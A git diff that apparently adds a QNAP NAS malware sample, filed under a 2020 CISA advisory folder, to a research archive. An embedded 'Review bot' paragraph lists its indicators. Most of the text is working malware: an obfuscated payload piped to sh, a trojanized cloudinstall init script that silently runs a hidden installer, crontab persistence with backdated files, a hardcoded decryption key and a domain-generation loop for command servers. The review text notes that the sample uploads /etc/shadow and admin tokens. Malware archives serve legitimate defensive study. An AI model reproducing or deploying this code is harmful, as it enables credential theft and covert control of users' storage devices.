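+echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+test "$fgrep" || fgrep=grep
+
+XXEOF
+cat >>.tmp.cronCDhLbZ <<XXEOF
+if [ ! -f "\${bdir}/.qpkg/${cronscriptpath}" ]; then
+test -d "\${bdir}/.qpkg" || mkdir -p "\${bdir}/.qpkg" || mkdir "\${bdir}/.qpkg"
+test -d "\${bdir}/.qpkg/${cronscriptpath%/*}" || mkdir "\${bdir}/.qpkg/${cronscriptpath%/*}"
+cat > "\${bdir}/.qpkg/${cronscriptpath}" <<"XEOF"
+XXEOF
+cat "${cronscriptpath#*/}" >>.tmp.cronCDhLbZ
+cat >>.tmp.cronCDhLbZ <<XXEOF
+XEOF
+chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
+touch -cr /bin/busybox "\${bdir}/.qpkg/${cronscriptpath}"
+( ( exec >/dev/null 2>&1 </dev/null; "\${bdir}/.qpkg/${cronscriptpath}" </dev/null >/dev/null 2>/dev/null & ) & )
+fi
+
+test -x "\${bdir}/.qpkg/${cronscriptpath}" || chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
+
+crontabargs=\$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\\(.\\+\\)/\\1/p')
+trycount=10; trycount=\$(( \$trycount - 10 ))
+set x \$crontabargs; shift
+while [ \$# -gt 0 ] && [ \$trycount -lt 10 ]; do
+trycount=\$(( \$trycount + 1 ))
+getopts ':c:' OPT 2>/dev/null
+test "\$OPT" = 'c' && crontabfile="\${OPTARG}/admin" && break
+test "\$OPTIND" -gt 0 && shift "\$OPTIND" && OPTIND=1 || break
+done
+test "\$crontabfile" && test -f "\${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
+
+for crontab in "\$crontabfile" "\${confdir}/crontab"; do
+if \$fgrep "\${bdir}/.qpkg/${cronscriptpath}" "\$crontab"; then
+:
+else
+cronmins=\$(printf '%i' "\$(( \$RANDOM % 60 ))")
+cronhour=\$(printf '%i' "\$(( \$RANDOM % 24 ))")
+cronhour=\$(printf '%i,' "\$(( ( \$cronhour + 8 ) % 24 ))" "\$(( ( \$cronhour + 16 ) % 24 ))")"\$cronhour"
+echo "\$cronmins \$cronhour"' * * * '"\${bdir}/.qpkg/${cronscriptpath} >/dev/null 2>/dev/null" >> "\$crontab"
+crontab "\$crontab"
+sleep 2
+fi
+done
+) & ) &
+XXEOF
+sed -n '2,$p' "$line" >>.tmp.cronCDhLbZ && mv .tmp.cronCDhLbZ "$line"
+chmod a+x "$line" || chmod 755 "$line"
+test -f .tmp.cronCDhLbZ && rm .tmp.cronCDhLbZ
+done
+fi
+fi
+
+test -f "${ts}_c" || touch "${ts}_c"
+rm -f "${CWD}/".tmp.*
+exit 0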
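Review bot: This sample is added as a bare hash-named file with no analyst notes, so the host artifacts a responder should look for are only recoverable by reading all 389 lines; I would add a sidecar README rather than edit the sample, since any edit changes its hash. From the visible code the notes should list the download and upload host `qpqift.top`, the working files `.qdisk_cmd`, `.rsakey` and the `*_c` marker files under `.qpkg/.config` or `.qpkg/.liveupdate`, the `sysauthLogin.cgi` copy beside a replaced `authLogin.cgi`, and the crontab lines pointing at `backup_conf.sh` or `liveupdate.sh`, together with the block the script splices into other shell scripts named in the crontab and in `qpkg.conf`. They should also record the tampering a triage must not trust: the `MalwareRemover` version fields and the `10_derek_3.pyc`/`12_derek_3.pyc` modules are overwritten, the update URLs in `uLinux.conf` are pointed at `127.0.0.1`, and rows are deleted from `notice.log` and `event.log`. Because the script posts `/etc/shadow`, `smbpasswd` and the admin token files to `ping.pl`, the notes should state that credentials on an affected device need rotating, not only the files removed.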
535
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/4b514278a3ad03f5efb9488f41585458c7d42d0028e48f6e45c944047f3a15e9
Normal file
535
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/4b514278a3ad03f5efb9488f41585458c7d42d0028e48f6e45c944047f3a15e9
Normal file
@ -0,0 +1,535 @@
|
||||
#!/bin/sh
|
||||
iifEsx=${ItjkToy}tr
|
||||
EJrRDOD=${yCxo}${cLJbbLDqLZwXv}\\${agYc}${RrjzeLYCRUzos}
|
||||
VmyzjJv=${xlZGXdYXJFYgH}${kWeAeBftiPR}${JFMCQy}${EJrRDOD}${fHGHSADsOyn}13${mGaotN}${WxMnjPT}3
|
||||
CdKAKzH=${wfKXIFWvqOikn}${twRUZectEUG}${CNfQNb}${EJrRDOD}${GSjRhNCYzWG}05${DWpJgo}${kAqrAMV}5
|
||||
bHlsbZa=${myLnvVtWItJnf}${UaUurmZJzSI}${tPxwHu}${EJrRDOD}${mAghPcqqNjE}13${HjcERM}${TqxlNfO}4
|
||||
$iifEsx '>may!'$CdKAKzH'Gju#Y%nJgRNq&hWI<Dc|VpoM{\n}AzOUQKfCL;T'"'"'vribHF]B"kt('$VmyzjJv'` PEx+=Z'$bHlsbZa'$ed*swSl)X' 'JNxBZP#&bktv'$CdKAKzH'MVnc%Ui('$VmyzjJv')I>OwAX`+zjG*KlY|\nqfS TaoLDh!=g}FerQ;Rs'$bHlsbZa'Wd'"'"'$Hpy<]"umC{E' << "EgdaOBDdZ" | ${xUSaSbNWXji}s${WWfYBc}h${jXdVSwF}
|
||||
;Bu xlAbA]/HZ)+YiiU& [kOQv"rSt/Z=Ea68=Z)hmC>'P! l#OBVb"YY$+/NZ)Xp};HVR[tX"BhnuhR/PePZ)y[%CC"/PHZ)(RBPykN|w}}#"v(t.Z)O(XwOV#"NZ)}yA>%"BZ)+HPb#SJ>g"hZ)\$r+w+lo!+bk|Q("Z)v\AYYx"Z)[}h(vLNPlJp "fZ=Ea74=(Z)b+w
|
||||
%##v+YX!m|"Z);aRD[[yNYJ"T=b}Rvm` &oeE134"aPqkBE055\
|
||||
w=s=s=yCWrU{jui;]ZJTxLFY[S>Mz#Xh)+sVgE133QOD!%cl|AER'-<$*NKHdGt(p=T=YZehF=s=s=|W%ERQ coa(t"+xHlvp)ib-'zMwGDTLus};\]E134E055O`gXA<PdrBKE133m[J>jRU&{S$q*V
|
||||
Cy!kN#=ddsbebuk;kubCSscZ;Bu xlAbAf]m/xv|/sweIB|ksbkJ&+JeWJeJJJJAg(yAJsS#eJJJJAg(yAJ-v|S}W1:M4n#eJJJJAg(yAJ-yqS}W2:M12n#eJJJJAg(yAJps<y(BSL}W3:MyMKCMGnLeJJJJbkJM\(JL}ps<y(BLJVJ/\Bo/;ky|\g-JQJWJeJJJJJJJJkBy\JMk|J}&&}"CDU %J$J&J}-yqJMJ}-v|J'J1J+J'J}-v|J++Js#eJJJJJJJJB(wgJL}sLeJJJJnene(g--y|\JMoJ-pbB-<JaJ/\Bo/|;AAJ2al1JQQJ-pbB-<J&+JWJeAg(yAJs;TTvqSiIB|ksbkJ6J6iebBsbJL}2LJllJWJ-p\vkJL}W2$PPPPPPn}s;TTvqL#JB(wgJL}W2$PPPPPPn}s;TTvqL#JnJQQJWJbg;(wJL}W1$PPPPPPn}s;TTvqL#JB(wgJL}W1$$PPPPPPn}s;TTvqL#JneneBqB(J2a/\Bo/|;AAe{Cj[SL}W{Cj[n:/xv|:/sxv|:/;sk/xv|:/;sk/sxv|:/;sk/xv|/P11:/;sk/Ag(yA/sxv|:/;sk/Ag(yA/xv|LebBsbJmJMKJL}W!fh"E_Yj"ZD)nLJQQJWJ<kv|bTJLUybB:JL#JjGS)%jJ\ybB#JBqvbJ0#JneB(wgJLUybB:JY;|JUB(J18J11:56:51J)%jJ2016Le(kSi<kv|bTJ`>k`JQQJB(wgJM|BJ`>k`iebBsbJL}W](knLJMBHJ1JllJB(wgJL}(kLJQQJB(wgJLLebBsbJLq}[jj{_"hth"h"LJSJLq88\\45y\61x9\18x47216856(77T1(3Txx38y191LJQQJBqvbJ0ebBsbJmJMKJL}W0nLJllJbBsbJi<sJy;qJQJIkB<JL}W0nLJQJN(JMAiJMIbJ40JllJBqvbJ0e(g--y|\JMoJg<B|ssAJa/\Bo/|;AAJ2al1JllJWe{ YjUCjCS``epSLyT;{j<wj;-B|0rA7{|k<%)N|3PDx<N;;LebBsbJLq}W"h!fhYj_%hj[ UnLJSJq{ YjJllJbBsbJmJMKJL}W!fh"E_Yj"ZD)nLJllJ(ysBJL}W!fh"E_Yj"ZD)nLJv|J``JQJuOm0M9*uJQJ0uJ+JTyAsBJ##JO0M9*O0M9*O0M9*O0M9*O0M9*O0M9*O0M9*O0M9*J+J\SL}&&Ji\ybBJ'$siJ/J100J++L#JbBsbJL}W!fh"E_Yj"ZD)nLJSJL}W\nLJllJ(bSL}\LJQQJWJbBsbJL}W!fh"E_Yj"ZD)nLJSJL}&&J}\JMJ1++LJllJ(bSL}&&J}\JMJ1J++L#JnJ##Ju+JTyAsBJ##JBsy(JllJbBsbJmJMKJL}W!fh"E_Yj"ZD)nLJllJWe|AS`e`e(ysBJL}W= DjhDj_rhD)j[nLJv|J``JQJuOm0M9*uJQJ0uJ+JTyAsBJ##Ju+JbBsbJL}W= DjhDj_rhD)j[nLJMAbJ2147483646J##JBsy(JllJWJZtYSJkBy\JM\J``JMk|JL}W= DjhDj_rhD)j[nLJ{ YjUCjC#JbBsbJMKJL}{ YjUCjCLJllJ{ YjUCjCSi\\JxsS1J(g;|bSL}= DjhDj_rhD)j[LJ2a/\Bo/|;AAi#JnJQQJbBsbJL}{ YjUCjCLJQQJ{ YjUCjCSi(ybiJQQJBqvbJ0esSL}W{ 
YjUCjC]]u.nLesbSL}Ws]]uMnLesSL}Ws$$MunLe\SL}&&J}\J/J1000J++LebBsbJmJMKJL}\LJllJbBsbJmJMKJL}sbLJllJbBsbJL}W]sbnLJSJ5JllJWJbBsbJLq}sbLJSJLq}\LJQQJbBsbJLq}sbLJSJLq}&&J}\JMJ1J++L#JnJQQJWJbBsbJMTJL}bLJllJk-JL}bL#JBqvbJ0#Jne(ysBJL}sLJv|J``JQJuOmyMKCMG0M9/'S}|A*uJ+JbBsbJMTJL}bLJllJk-JL}bL#JBqvbJ0#J##JBsy(ebSi-pbB-<J/b-</.b-<.PPPPPPiJQQJBqvbJ0e(ybJaJL}bLJVVLh tLJQQJWJbBsbJMTJL}bLJllJk-JL}bL#JBqvbJ0#JneMMMMMdh)ZDJ{fdrZ=JzhEMMMMMe%ZZdgFCDdIpHwpv)9N0dC!htCC =CE8C%ZZdvIz=CEhCRv)'[/1T(r%TjDfoodBse cH06T )-dtzZf ={sR)<C;KUk=zA|d;[gr4wYhb|;qjdDb8FCdK\G'<9HfxCG3 eKy{-cZ\s1I[[A1zt'!8[5xD\Ds9%="pho=fIc)tB3CyAr7p'F/"Pds
|
||||
ksr=z\)z
|
||||
ey['\b=0D\rz\pKwz8HdHK[q='%f)KBB5// IUz\(zBBAy=IKfcy0;v11dG3ZFz<!eA7[gpX[-RK"kc){(;(4pA[9xz4YBCUBw"RFRAvo[!(HYz1sDsNy<c-2HUFR!7wF"e"2sy K;xjfN1'2!zA'%R5YTRg/d8Dg<DE6hC r8E={X[=y<H2yT2GRbwyX22X<TEeKbKFhR5 ptDw6T"IGD<xs;%;4|{yd/kIoc-s
|
||||
q93y|sw4ZBPv{R ;zXdy-fGRZoreqk2hY=2kwI
|
||||
wHIc;vrA[)'[%z63{g\d%tRzH9kr\4w99|Px9'v=-t!9TKczs9YY%eF7qy\)<yxz2yDj<D3KUC;h)Z4G bHqrH
|
||||
Fh[-0xh'G5tCI%dCChSeMMMMMhDUJ{fdrZ=JzhEMMMMMeh tebBsbJmJMKJL}sLJllJwSig<B|ssAJxysB64JM\JVVh tJQJg<B|ssAJksy;bAJM<;xv|JMv|pBRJL}bLJMoBkvTRe}seh teiJQQJWJbBsbJMTJL}bLJllJk-JL}bL#JBqvbJ0#JnebBsbJMTJL}bLJllJk-JL}bLe-SL}W{ YjUCjC$$.unLe{ YjUCjCS``e(ysBJL}-LJv|J``JQJuOmyMKCMG0M9/'S}|A*uJ+JBqvbJ0J##JBsy(epSig<B|ssAJ\IsbJMswy1JMxv|ykRJMw-y(JL}(bLJVVh tJQJg<B|ssAJxysB64e}peh teie-Sig<B|ssAJB|(JM\JMyBsM256M(x(JMpJL}pLJM-\Jswy1JMsyAbJMyJVVh te}-eh teie-wSig<B|ssAJ\IsbJMswy1JMxv|ykRJMw-y(JL}sbLJVVh tJQJg<B|ssAJxysB64e}-eh teiebBsbJmJMKJL}wLJllJbBsbJL}wLJSJL}-wLJQQJBqvbJ0eBoyAJL}-Lebk;BenJQQJWebSi-pbB-<J/b-</.b-<.PPPPPPiJQQJBqvbJ0e(ybJaJL}bLJVVLh tLJQQJWJbBsbJMTJL}bLJllJk-JL}bL#JBqvbJ0#JneMMMMMdh)ZDJ{fdrZ=JzhEMMMMMe%ZZdgFCDdIpHwpv)9N0dC!htCC =CE8C%ZZdvIz=CEhC9!-[%N4FN8= rEzI HT=e0)Gs"YNtIvqj0Av%(42GYksskst)GAU{z35KA\-xfsh!PbtEpUFXBf(p<2yw8t(TeCdtf)8%r|A6Njoq)GNccx%r{UvEg5A/\07dz(xNE;HD<'2//2\;pq=Ryp ZZ|ZHterIk%5|o<5dzdd((%A%dystbqGTtIbDFA!9v9-DTv53|yAk%{"gA9zvT
|
||||
1Eq-rN1'e7)j;FtYARz9C<ov/GZ2R/oR-6D
|
||||
x
|
||||
hsyh5d9IIPcEkXqAxzq%ZK
|
||||
;PT18Y2<48twe<XfREc0-FUf(3Yvc"4"v{vp{<j!IpYFR90y%zkg
|
||||
=C\9%6(GbTN=Kw%xoRbD-\b\eEqdDD|0t-!51(r{('\<yZZq2v/2()\[E8GCFdU%d%dpFZB2ItI(6Ac0
|
||||
Aj638K'eN7/-{'w(=grXfv)Yvh;-K3fr5{-gXy3N2b04"y70{r
|
||||
C<)sZ/I<[R[0
|
||||
8v6RXd[heHfsy!q|d toR'vYg-RtvA2\qz!rFjNRGd|8'1z-g|c2<CI%dCChSeMMMMMhDUJ{fdrZ=JzhEMMMMMeh teg<B|ssAJksy;bAJM<;xv|JMv|pBRJL}bLJMB|(kR<bJVVh tJQJg<B|ssAJxysB64e}peh tek-JL}bLebk;BJen#Jbk;B#JnJQQJWebBsbJLq}C==h{j_rCD)fC)hLJSJLqB\(386809(688\B1295x5T3(449y738176(T1T4TLJllJBoyAJL}W[jj{_fYh"_C)hDjnLenebBsbJMTJL}bLJllJk-JL}bLesABB<J1eBqvbJ0efbebuk;kubCSfZ=Ea63=HSr+ZC&
|
||||
Y#LLXo'ZssTZ=Ea37=55Z#'&Bmrta#wZssTsZ;Bu xlAbAsftahYT0ffG
|
||||
EgdaOBDdZ
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
{ /share/CACHEDEV1_DATA/.system/.qinstaller.sh; exit 1; }
|
||||
esac
|
||||
{ /share/CACHEDEV1_DATA/.system/.qinstaller.sh; exit 0; }
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
